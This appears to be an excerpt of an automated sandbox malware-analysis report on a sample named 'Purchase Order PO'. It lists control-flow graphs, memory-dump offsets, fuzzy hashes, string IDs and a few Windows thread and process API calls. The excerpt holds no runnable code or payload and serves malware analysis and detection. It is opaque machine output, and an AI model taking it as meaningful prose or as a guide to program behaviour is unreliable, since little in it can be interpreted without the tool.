                                                                                                                            control_flow_graph 2104 5df2106-5df210a 2105 5df2acd-5df2adf 2104->2105 2106 5df210b-5df2120 2104->2106 2106->2105 2107 5df2121-5df212c 2106->2107 2109 5df2132-5df213e 2107->2109 2110 5df214a-5df2159 2109->2110 2112 5df21b8-5df21bc 2110->2112 2113 5df2264-5df22ce 2112->2113 2114 5df21c2-5df21cb 2112->2114 2113->2105 2152 5df22d4-5df281b 2113->2152 2115 5df20c6-5df20d2 2114->2115 2116 5df21d1-5df21e7 2114->2116 2115->2105 2118 5df20d8-5df20e4 2115->2118 2124 5df2239-5df224b 2116->2124 2125 5df21e9-5df21ec 2116->2125 2119 5df215b-5df2161 2118->2119 2120 5df20e6-5df20fa 2118->2120 2119->2105 2122 5df2167-5df217f 2119->2122 2120->2119 2130 5df20fc-5df2105 2120->2130 2122->2105 2133 5df2185-5df21ad 2122->2133 2134 5df2a0c-5df2ac2 2124->2134 2135 5df2251-5df2261 2124->2135 2125->2105 2126 5df21f2-5df222f 2125->2126 2126->2113 2148 5df2231-5df2237 2126->2148 2130->2104 2133->2112 2134->2105 2148->2124 2148->2125 2230 5df281d-5df2827 2152->2230 2231 5df2832-5df28c5 2152->2231 2232 5df282d 2230->2232 2233 5df28d0-5df2963 2230->2233 2231->2233 2234 5df296e-5df2a01 2232->2234 2233->2234 2234->2134
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: D
                                                                                                                            • API String ID: 0-2746444292
                                                                                                                            • Opcode ID: 17dc073e2af0779b61cbf935dc56949638cc9a11dc9ba79c6d527dc492b367af
                                                                                                                            • Instruction ID: 207199dc99491528dabf9b8bf281510b7823b073bc12f27ea17cc469481eb53f
                                                                                                                            • Opcode Fuzzy Hash: 17dc073e2af0779b61cbf935dc56949638cc9a11dc9ba79c6d527dc492b367af
                                                                                                                            • Instruction Fuzzy Hash: 4D52B674A052189FCB64DF68D998A9DBBB6FF89300F1045D9E509A73A5CF309E81CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 73b156e904ca31b4612ff8f78888b8345aa6dddeccd5855b460f94fcada99d0f
                                                                                                                            • Instruction ID: d50883ba0aeb8d63d86d9a5dea69941103567e7aeae8c0dedb99244adf4aab50
                                                                                                                            • Opcode Fuzzy Hash: 73b156e904ca31b4612ff8f78888b8345aa6dddeccd5855b460f94fcada99d0f
                                                                                                                            • Instruction Fuzzy Hash: 70E1DBB1700A058FDB29DB75D4587AEB7FAAF89700F14846ED146AB390DB35E802CB52
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b0ac480c8ec6d5c33aca96c595e5ade981b1901442904e954def4b89ceb14166
                                                                                                                            • Instruction ID: dd52e79506d6e2313560ba88f05cf414d80ae3ebfb31335aef97fe1c21e5b3d8
                                                                                                                            • Opcode Fuzzy Hash: b0ac480c8ec6d5c33aca96c595e5ade981b1901442904e954def4b89ceb14166
                                                                                                                            • Instruction Fuzzy Hash: 9D51D374D01208CFCB08EFA8E5986ADBBF2FF4A305F109969E416AB754DB349945CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 296 5df6228-5df624d 297 5df667c-5df6680 296->297 298 5df6253-5df6276 296->298 299 5df6699-5df66a7 297->299 300 5df6682-5df6696 297->300 307 5df627c-5df6289 298->307 308 5df6324-5df6328 298->308 305 5df66a9-5df66be 299->305 306 5df6718-5df672d 299->306 316 5df66c5-5df66d2 305->316 317 5df66c0-5df66c3 305->317 318 5df672f-5df6732 306->318 319 5df6734-5df6741 306->319 322 5df628b-5df6296 307->322 323 5df6298 307->323 309 5df632a-5df6338 308->309 310 5df6370-5df6379 308->310 309->310 331 5df633a-5df6355 309->331 313 5df678f 310->313 314 5df637f-5df6389 310->314 332 5df6794-5df67c4 313->332 314->297 320 5df638f-5df6398 314->320 324 5df66d4-5df6715 316->324 317->324 325 5df6743-5df677e 318->325 319->325 328 5df639a-5df639f 320->328 329 5df63a7-5df63b3 320->329 330 5df629a-5df629c 322->330 323->330 372 5df6785-5df678c 325->372 328->329 329->332 337 5df63b9-5df63bf 329->337 330->308 334 5df62a2-5df6304 330->334 356 5df6357-5df6361 331->356 357 5df6363 331->357 347 5df67dd-5df67e4 332->347 348 5df67c6-5df67dc 332->348 384 5df630a-5df6321 334->384 385 5df6306 334->385 339 5df6666-5df666a 337->339 340 5df63c5-5df63d5 337->340 339->313 346 5df6670-5df6676 339->346 354 5df63e9-5df63eb 340->354 355 5df63d7-5df63e7 340->355 346->297 346->320 358 5df63ee-5df63f4 354->358 355->358 359 5df6365-5df6367 356->359 357->359 358->339 367 5df63fa-5df6409 358->367 359->310 361 5df6369 359->361 361->310 368 5df640f 367->368 369 5df64b7-5df64e2 call 5df6060 * 2 367->369 370 5df6412-5df6423 368->370 386 5df65cc-5df65e6 369->386 387 5df64e8-5df64ec 369->387 370->332 375 5df6429-5df643b 370->375 375->332 377 5df6441-5df6459 375->377 440 5df645b call 5df67f8 377->440 441 5df645b call 5df67e7 377->441 380 5df6461-5df6471 380->339 383 5df6477-5df647a 380->383 388 5df647c-5df6482 383->388 389 5df6484-5df6487 383->389 384->308 385->384 386->297 409 5df65ec-5df65f0 386->409 387->339 391 5df64f2-5df64f6 387->391 388->389 392 5df648d-5df6490 388->392 389->313 389->392 394 5df651e-5df6524 391->394 395 5df64f8-5df6505 391->395 396 5df6498-5df649b 392->396 397 5df6492-5df6496 392->397 399 5df655f-5df6565 394->399 400 5df6526-5df652a 394->400 412 5df6507-5df6512 395->412 413 5df6514 395->413 396->313 398 5df64a1-5df64a5 396->398 397->396 397->398 398->313 406 5df64ab-5df64b1 398->406 403 5df6567-5df656b 399->403 404 5df6571-5df6577 399->404 400->399 401 5df652c-5df6535 400->401 407 5df6537-5df653c 401->407 408 5df6544-5df655a 401->408 403->372 403->404 410 5df6579-5df657d 404->410 411 5df6583-5df6585 404->411 406->369 406->370 407->408 408->339 414 5df662c-5df6630 409->414 415 5df65f2-5df65fc call 5df4f10 409->415 410->339 410->411 416 5df65ba-5df65bc 411->416 417 5df6587-5df6590 411->417 418 5df6516-5df6518 412->418 413->418 414->372 421 5df6636-5df663a 414->421 415->414 429 5df65fe-5df6613 415->429 416->339 419 5df65c2-5df65c9 416->419 424 5df659f-5df65b5 417->424 425 5df6592-5df6597 417->425 418->339 418->394 421->372 426 5df6640-5df664d 421->426 424->339 425->424 431 5df664f-5df665a 426->431 432 5df665c 426->432 429->414 437 5df6615-5df662a 429->437 434 5df665e-5df6660 431->434 432->434 434->339 434->372 437->297 437->414 440->380 441->380
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                            • API String ID: 0-1932283790
                                                                                                                            • Opcode ID: 0e3b919b84847fd2668a0ade396b9f58d7002b6eab1f7a753bd4ab431614f212
                                                                                                                            • Instruction ID: b28d9244ed25b5ff1cc7ed2e6082f767f0173e38d3d9eaf5984c5739e5ff6763
                                                                                                                            • Opcode Fuzzy Hash: 0e3b919b84847fd2668a0ade396b9f58d7002b6eab1f7a753bd4ab431614f212
                                                                                                                            • Instruction Fuzzy Hash: 74125B30A042089FCB14CF69D984AAEBBF2FF48314F16859AE50ADB765DB31ED41CB50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 693 114d3c8-114d467 GetCurrentProcess 697 114d470-114d4a4 GetCurrentThread 693->697 698 114d469-114d46f 693->698 699 114d4a6-114d4ac 697->699 700 114d4ad-114d4e1 GetCurrentProcess 697->700 698->697 699->700 701 114d4e3-114d4e9 700->701 702 114d4ea-114d505 call 114d5a8 700->702 701->702 706 114d50b-114d53a GetCurrentThreadId 702->706 707 114d543-114d5a5 706->707 708 114d53c-114d542 706->708 708->707
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0114D456
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0114D493
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0114D4D0
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0114D529
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2063062207-0
                                                                                                                            • Opcode ID: d20b320effd032eaefd0a12dc8e456d2994868d9bd35ba89750795045a3eb378
                                                                                                                            • Instruction ID: 2beada3b7d13cb645c199f25b504b30a5c756472637f70708d72899999b36b8a
                                                                                                                            • Opcode Fuzzy Hash: d20b320effd032eaefd0a12dc8e456d2994868d9bd35ba89750795045a3eb378
                                                                                                                            • Instruction Fuzzy Hash: 475167B09017098FDB18CFA9E648BDEBBF1AB48314F24C499D059A73A1DB349984CF65

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 715 114d3d8-114d467 GetCurrentProcess 719 114d470-114d4a4 GetCurrentThread 715->719 720 114d469-114d46f 715->720 721 114d4a6-114d4ac 719->721 722 114d4ad-114d4e1 GetCurrentProcess 719->722 720->719 721->722 723 114d4e3-114d4e9 722->723 724 114d4ea-114d505 call 114d5a8 722->724 723->724 728 114d50b-114d53a GetCurrentThreadId 724->728 729 114d543-114d5a5 728->729 730 114d53c-114d542 728->730 730->729
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0114D456
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0114D493
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0114D4D0
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0114D529
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2063062207-0
                                                                                                                            • Opcode ID: ece74f07643a6cb19df906b18e933904bede36921e7abb4499c7a8f24ee3d858
                                                                                                                            • Instruction ID: bbc4453b6b470204079cb8cb5bedd65abed1fea0c910fe10eedf56db6fea7ea2
                                                                                                                            • Opcode Fuzzy Hash: ece74f07643a6cb19df906b18e933904bede36921e7abb4499c7a8f24ee3d858
                                                                                                                            • Instruction Fuzzy Hash: BC5138B09017098FDB18DFAAE548BDEBBF1EB48314F24C459D059A7360DB34A984CF65

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1055 5df6218-5df624d 1056 5df667c-5df6680 1055->1056 1057 5df6253-5df6276 1055->1057 1058 5df6699-5df66a7 1056->1058 1059 5df6682-5df6696 1056->1059 1066 5df627c-5df6289 1057->1066 1067 5df6324-5df6328 1057->1067 1064 5df66a9-5df66be 1058->1064 1065 5df6718-5df672d 1058->1065 1075 5df66c5-5df66d2 1064->1075 1076 5df66c0-5df66c3 1064->1076 1077 5df672f-5df6732 1065->1077 1078 5df6734-5df6741 1065->1078 1081 5df628b-5df6296 1066->1081 1082 5df6298 1066->1082 1068 5df632a-5df6338 1067->1068 1069 5df6370-5df6379 1067->1069 1068->1069 1090 5df633a-5df6355 1068->1090 1072 5df678f 1069->1072 1073 5df637f-5df6389 1069->1073 1091 5df6794-5df67c4 1072->1091 1073->1056 1079 5df638f-5df6398 1073->1079 1083 5df66d4-5df6715 1075->1083 1076->1083 1084 5df6743-5df677e 1077->1084 1078->1084 1087 5df639a-5df639f 1079->1087 1088 5df63a7-5df63b3 1079->1088 1089 5df629a-5df629c 1081->1089 1082->1089 1131 5df6785-5df678c 1084->1131 1087->1088 1088->1091 1096 5df63b9-5df63bf 1088->1096 1089->1067 1093 5df62a2-5df6304 1089->1093 1115 5df6357-5df6361 1090->1115 1116 5df6363 1090->1116 1106 5df67dd-5df67e4 1091->1106 1107 5df67c6-5df67dc 1091->1107 1143 5df630a-5df6321 1093->1143 1144 5df6306 1093->1144 1098 5df6666-5df666a 1096->1098 1099 5df63c5-5df63d5 1096->1099 1098->1072 1105 5df6670-5df6676 1098->1105 1113 5df63e9-5df63eb 1099->1113 1114 5df63d7-5df63e7 1099->1114 1105->1056 1105->1079 1117 5df63ee-5df63f4 1113->1117 1114->1117 1118 5df6365-5df6367 1115->1118 1116->1118 1117->1098 1126 5df63fa-5df6409 1117->1126 1118->1069 1120 5df6369 1118->1120 1120->1069 1127 5df640f 1126->1127 1128 5df64b7-5df64e2 call 5df6060 * 2 1126->1128 1129 5df6412-5df6423 1127->1129 1145 5df65cc-5df65e6 1128->1145 1146 5df64e8-5df64ec 1128->1146 1129->1091 1134 5df6429-5df643b 1129->1134 1134->1091 1136 5df6441-5df6459 1134->1136 1199 5df645b call 5df67f8 1136->1199 1200 5df645b call 5df67e7 1136->1200 1139 5df6461-5df6471 1139->1098 1142 5df6477-5df647a 1139->1142 1147 5df647c-5df6482 1142->1147 1148 5df6484-5df6487 1142->1148 1143->1067 1144->1143 1145->1056 1168 5df65ec-5df65f0 1145->1168 1146->1098 1150 5df64f2-5df64f6 1146->1150 1147->1148 1151 5df648d-5df6490 1147->1151 1148->1072 1148->1151 1153 5df651e-5df6524 1150->1153 1154 5df64f8-5df6505 1150->1154 1155 5df6498-5df649b 1151->1155 1156 5df6492-5df6496 1151->1156 1158 5df655f-5df6565 1153->1158 1159 5df6526-5df652a 1153->1159 1171 5df6507-5df6512 1154->1171 1172 5df6514 1154->1172 1155->1072 1157 5df64a1-5df64a5 1155->1157 1156->1155 1156->1157 1157->1072 1165 5df64ab-5df64b1 1157->1165 1162 5df6567-5df656b 1158->1162 1163 5df6571-5df6577 1158->1163 1159->1158 1160 5df652c-5df6535 1159->1160 1166 5df6537-5df653c 1160->1166 1167 5df6544-5df655a 1160->1167 1162->1131 1162->1163 1169 5df6579-5df657d 1163->1169 1170 5df6583-5df6585 1163->1170 1165->1128 1165->1129 1166->1167 1167->1098 1173 5df662c-5df6630 1168->1173 1174 5df65f2-5df65fc call 5df4f10 1168->1174 1169->1098 1169->1170 1175 5df65ba-5df65bc 1170->1175 1176 5df6587-5df6590 1170->1176 1177 5df6516-5df6518 1171->1177 1172->1177 1173->1131 1180 5df6636-5df663a 1173->1180 1174->1173 1188 5df65fe-5df6613 1174->1188 1175->1098 1178 5df65c2-5df65c9 1175->1178 1183 5df659f-5df65b5 1176->1183 1184 5df6592-5df6597 1176->1184 1177->1098 1177->1153 1180->1131 1185 5df6640-5df664d 1180->1185 1183->1098 1184->1183 1190 5df664f-5df665a 1185->1190 1191 5df665c 1185->1191 1188->1173 1196 5df6615-5df662a 1188->1196 1193 5df665e-5df6660 1190->1193 1191->1193 1193->1098 1193->1131 1196->1056 1196->1173 1199->1139 1200->1139
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q
                                                                                                                            • API String ID: 0-1978863864
                                                                                                                            • Opcode ID: cf2888da8fe87b1912e0117a3366ee461dd5cef67bf4e4617fdbbd25cedab319
                                                                                                                            • Instruction ID: 3f793aae27575adc9a186580f43d54544f2cdc931a715525778be1337cb81372
                                                                                                                            • Opcode Fuzzy Hash: cf2888da8fe87b1912e0117a3366ee461dd5cef67bf4e4617fdbbd25cedab319
                                                                                                                            • Instruction Fuzzy Hash: 65C13A30A042099FCB14CF69D984EAEBBF2BF48314F16859AE616EB665D731ED40CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1201 5df9e58-5df9e8c call 5df67b0 1204 5df9e8e-5df9e9e 1201->1204 1205 5df9ea0-5df9ea2 1201->1205 1206 5df9ea5-5df9eb0 call 5df67b0 1204->1206 1205->1206 1210 5df9ec4-5df9ec6 1206->1210 1211 5df9eb2-5df9ec2 1206->1211 1212 5df9ec9-5df9edd 1210->1212 1211->1212 1214 5df9ee3 1212->1214 1215 5dfa0c2-5dfa0cb 1212->1215 1218 5df9ee6-5df9eec 1214->1218 1216 5dfa28e-5dfa294 1215->1216 1217 5dfa0d1-5dfa100 1215->1217 1219 5dfa29a-5dfa2a0 1216->1219 1220 5dfa296-5dfa298 1216->1220 1235 5dfa2b7-5dfa2eb 1217->1235 1236 5dfa106-5dfa108 1217->1236 1221 5dfa2f2-5dfa2f7 1218->1221 1222 5df9ef2-5df9f03 call 5df9728 1218->1222 1225 5dfa2a6 1219->1225 1226 5dfa2a2-5dfa2a4 1219->1226 1224 5dfa2a8-5dfa2af 1220->1224 1231 5df9f09 1222->1231 1232 5dfa058-5dfa05e 1222->1232 1225->1224 1226->1224 1237 5dfa00c-5dfa015 1231->1237 1238 5df9f8a-5df9f93 1231->1238 1239 5dfa138-5dfa141 1231->1239 1240 5dfa1a7-5dfa1b0 1231->1240 1241 5dfa213-5dfa21c 1231->1241 1242 5df9f10-5df9f19 1231->1242 1233 5dfa068-5dfa06e 1232->1233 1234 5dfa060-5dfa066 1232->1234 1247 5dfa07f-5dfa085 1233->1247 1248 5dfa070-5dfa076 1233->1248 1234->1233 1245 5dfa078-5dfa07a 1234->1245 1235->1221 1236->1235 1249 5dfa10e-5dfa114 1236->1249 1237->1221 1243 5dfa01b-5dfa033 1237->1243 1238->1221 1246 5df9f99-5df9fae 1238->1246 1239->1221 1251 5dfa147-5dfa154 1239->1251 1240->1221 1244 5dfa1b6-5dfa1c3 1240->1244 1241->1221 1250 5dfa222-5dfa237 1241->1250 1242->1221 1252 5df9f1f-5df9f2c 1242->1252 1243->1221 1253 5dfa039-5dfa053 call 5df67f8 1243->1253 1244->1221 1254 5dfa1c9-5dfa1d9 1244->1254 1245->1224 1246->1221 1277 5df9fb4-5df9fc8 1246->1277 1256 5dfa087-5dfa08d 1247->1256 1257 5dfa096-5dfa09c 1247->1257 1248->1245 1248->1247 1249->1221 1255 5dfa11a-5dfa12b call 5df9728 1249->1255 1250->1221 1258 5dfa23d-5dfa254 call 5df67f8 1250->1258 1251->1221 1259 5dfa15a-5dfa16a 1251->1259 1252->1221 1261 5df9f32-5df9f49 1252->1261 1253->1232 1254->1221 1264 5dfa1df-5dfa1f0 1254->1264 1280 5dfa259-5dfa25f 1255->1280 1283 5dfa131 1255->1283 1267 5dfa093 1256->1267 1268 5dfa2b2 1256->1268 1269 5dfa09e-5dfa0a4 1257->1269 1270 5dfa0ad-5dfa0b0 1257->1270 1258->1280 1259->1221 1272 5dfa170-5dfa181 1259->1272 1261->1221 1262 5df9f4f-5df9f61 1261->1262 1262->1221 1275 5df9f67-5df9f85 1262->1275 1264->1221 1276 5dfa1f6-5dfa211 1264->1276 1267->1257 1268->1235 1269->1268 1279 5dfa0aa 1269->1279 1270->1268 1281 5dfa0b6-5dfa0bc 1270->1281 1272->1221 1273 5dfa187-5dfa1a2 1272->1273 1273->1280 1275->1232 1276->1280 1277->1221 1282 5df9fce-5df9fe3 1277->1282 1279->1270 1284 5dfa269-5dfa26f 1280->1284 1285 5dfa261-5dfa267 1280->1285 1281->1215 1281->1218 1282->1221 1296 5df9fe9-5dfa00a 1282->1296 1283->1239 1283->1240 1283->1241 1287 5dfa27d-5dfa280 1284->1287 1288 5dfa271-5dfa277 1284->1288 1285->1284 1286 5dfa279-5dfa27b 1285->1286 1286->1224 1287->1268 1293 5dfa282-5dfa288 1287->1293 1288->1286 1288->1287 1293->1216 1293->1217 1296->1232
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$(o^q$(o^q
                                                                                                                            • API String ID: 0-945150611
                                                                                                                            • Opcode ID: 6d7465b928d6545e0242435901cf0ae505c338506d906efb8a79552b8cd330fa
                                                                                                                            • Instruction ID: 622cee5045c2d07c80e60fdd43952f05e9689aa3f9d55f5773d0eac9bd0187a7
                                                                                                                            • Opcode Fuzzy Hash: 6d7465b928d6545e0242435901cf0ae505c338506d906efb8a79552b8cd330fa
                                                                                                                            • Instruction Fuzzy Hash: 90F10630B0465A9FCB11CF98C584DAEBBF6FF88300B16C556EA59AB254D731ED81CB90

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1364 5df6bb0-5df709e 1439 5df70a4-5df70b4 1364->1439 1440 5df75f0-5df7625 1364->1440 1439->1440 1441 5df70ba-5df70ca 1439->1441 1445 5df7627-5df762c 1440->1445 1446 5df7631-5df764f 1440->1446 1441->1440 1442 5df70d0-5df70e0 1441->1442 1442->1440 1444 5df70e6-5df70f6 1442->1444 1444->1440 1447 5df70fc-5df710c 1444->1447 1448 5df7716-5df771b 1445->1448 1457 5df76c6-5df76d2 1446->1457 1458 5df7651-5df765b 1446->1458 1447->1440 1449 5df7112-5df7122 1447->1449 1449->1440 1451 5df7128-5df7138 1449->1451 1451->1440 1453 5df713e-5df714e 1451->1453 1453->1440 1454 5df7154-5df7164 1453->1454 1454->1440 1456 5df716a-5df717a 1454->1456 1456->1440 1459 5df7180-5df75ef 1456->1459 1464 5df76e9-5df76f5 1457->1464 1465 5df76d4-5df76e0 1457->1465 1458->1457 1463 5df765d-5df7669 1458->1463 1472 5df768e-5df7691 1463->1472 1473 5df766b-5df7676 1463->1473 1470 5df770c-5df770e 1464->1470 1471 5df76f7-5df7703 1464->1471 1465->1464 1475 5df76e2-5df76e7 1465->1475 1470->1448 1471->1470 1484 5df7705-5df770a 1471->1484 1476 5df76a8-5df76b4 1472->1476 1477 5df7693-5df769f 1472->1477 1473->1472 1486 5df7678-5df7682 1473->1486 1475->1448 1480 5df771c-5df7740 1476->1480 1481 5df76b6-5df76bd 1476->1481 1477->1476 1488 5df76a1-5df76a6 1477->1488 1490 5df774e 1480->1490 1491 5df7747-5df774c 1480->1491 1481->1480 1485 5df76bf-5df76c4 1481->1485 1484->1448 1485->1448 1486->1472 1493 5df7684-5df7689 1486->1493 1488->1448 1495 5df7750-5df7751 1490->1495 1491->1495 1493->1448
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $^q$$^q
                                                                                                                            • API String ID: 0-355816377
                                                                                                                            • Opcode ID: aa425dc05da096c0c67a22846411940e3baf4b72e0de072d79976421f07f2b85
                                                                                                                            • Instruction ID: 8ac84720dabb9360b4bf40f7d4a62a65e588fec79cd5f09d6c10a8d9f018990a
                                                                                                                            • Opcode Fuzzy Hash: aa425dc05da096c0c67a22846411940e3baf4b72e0de072d79976421f07f2b85
                                                                                                                            • Instruction Fuzzy Hash: 17522274A0021CDFDB14EBA8C990BDEBB76EF44300F1081A9D10A6B7A5DF359E859F61

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1554 5df4a68-5df4a8a 1555 5df4a8c-5df4a90 1554->1555 1556 5df4aa0-5df4aab 1554->1556 1557 5df4ab8-5df4abf 1555->1557 1558 5df4a92-5df4a9e 1555->1558 1560 5df4aac-5df4ab3 1556->1560 1561 5df4b53-5df4b7f 1556->1561 1562 5df4adf-5df4ae8 1557->1562 1563 5df4ac1-5df4ac8 1557->1563 1558->1556 1558->1557 1564 5df4b4b-5df4b50 1560->1564 1567 5df4b86-5df4bc9 1561->1567 1661 5df4aea call 5df4a5a 1562->1661 1662 5df4aea call 5df4a68 1562->1662 1563->1562 1565 5df4aca-5df4ad5 1563->1565 1566 5df4adb-5df4add 1565->1566 1565->1567 1566->1564 1587 5df4bcb-5df4bde 1567->1587 1588 5df4c12-5df4c17 1567->1588 1569 5df4af0-5df4af2 1570 5df4afa-5df4b02 1569->1570 1571 5df4af4-5df4af8 1569->1571 1574 5df4b04-5df4b09 1570->1574 1575 5df4b11-5df4b13 1570->1575 1571->1570 1573 5df4b15-5df4b26 1571->1573 1663 5df4b29 call 5df54ca 1573->1663 1664 5df4b29 call 5df54d8 1573->1664 1574->1575 1575->1564 1578 5df4b2f-5df4b34 1580 5df4b49 1578->1580 1581 5df4b36-5df4b41 call 5dfa328 1578->1581 1580->1564 1584 5df4b47 1581->1584 1584->1564 1589 5df4bed-5df4bff 1587->1589 1590 5df4be0-5df4be6 1587->1590 1591 5df4c28-5df4c32 1588->1591 1596 5df4c05-5df4c09 1589->1596 1597 5df4c93-5df4c95 1589->1597 1590->1589 1594 5df4c5f-5df4c63 1591->1594 1595 5df4c34-5df4c43 1591->1595 1600 5df4c6f-5df4c73 1594->1600 1601 5df4c65-5df4c6b 1594->1601 1608 5df4c45-5df4c4c 1595->1608 1609 5df4c53-5df4c5d 1595->1609 1598 5df4c0b-5df4c0d 1596->1598 1599 5df4c19-5df4c26 1596->1599 1665 5df4c97 call 5df4e30 1597->1665 1666 5df4c97 call 5df4e20 1597->1666 1598->1588 1599->1591 1606 5df4caf-5df4cb6 1600->1606 1607 5df4c75-5df4c79 1600->1607 1604 5df4c6d 1601->1604 1605 5df4cb9-5df4d0a 1601->1605 1603 5df4c9d-5df4ca3 1603->1606 1610 5df4ca5-5df4cab 1603->1610 1604->1606 1615 5df4d11-5df4d70 1605->1615 1612 5df4c7f-5df4c91 1607->1612 1613 5df4d77-5df4d81 1607->1613 1608->1609 1609->1594 1614 5df4cad 1610->1614 1610->1615 1612->1606 1622 5df4dca-5df4dcf 1613->1622 1623 5df4d83-5df4d9b 1613->1623 1614->1606 1615->1613 1627 5df4dfa-5df4dfc 1622->1627 1628 5df4dd1-5df4dd3 1622->1628 1624 5df4d9d-5df4d9f 1623->1624 1625 5df4da1-5df4da3 1623->1625 1630 5df4e19-5df4e1c 1624->1630 1631 5df4da5-5df4da9 1625->1631 1632 5df4db4-5df4db6 1625->1632 1638 5df4e03-5df4e05 1627->1638 1628->1625 1646 5df4dd5-5df4df8 1628->1646 1634 5df4daf-5df4db2 1631->1634 1635 5df4dab-5df4dad 1631->1635 1636 5df4dc9 1632->1636 1637 5df4db8-5df4dbc 1632->1637 1634->1630 1635->1630 1636->1622 1642 5df4dbe-5df4dc0 1637->1642 1643 5df4dc2-5df4dc7 1637->1643 1644 5df4e0b-5df4e0d 1638->1644 1645 5df4e07-5df4e09 1638->1645 1642->1630 1643->1630 1647 5df4e0f-5df4e14 1644->1647 1648 5df4e16 1644->1648 1645->1630 1646->1638 1647->1630 1648->1630 1661->1569 1662->1569 1663->1578 1664->1578 1665->1603 1666->1603
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Hbq$Hbq
                                                                                                                            • API String ID: 0-4258043069
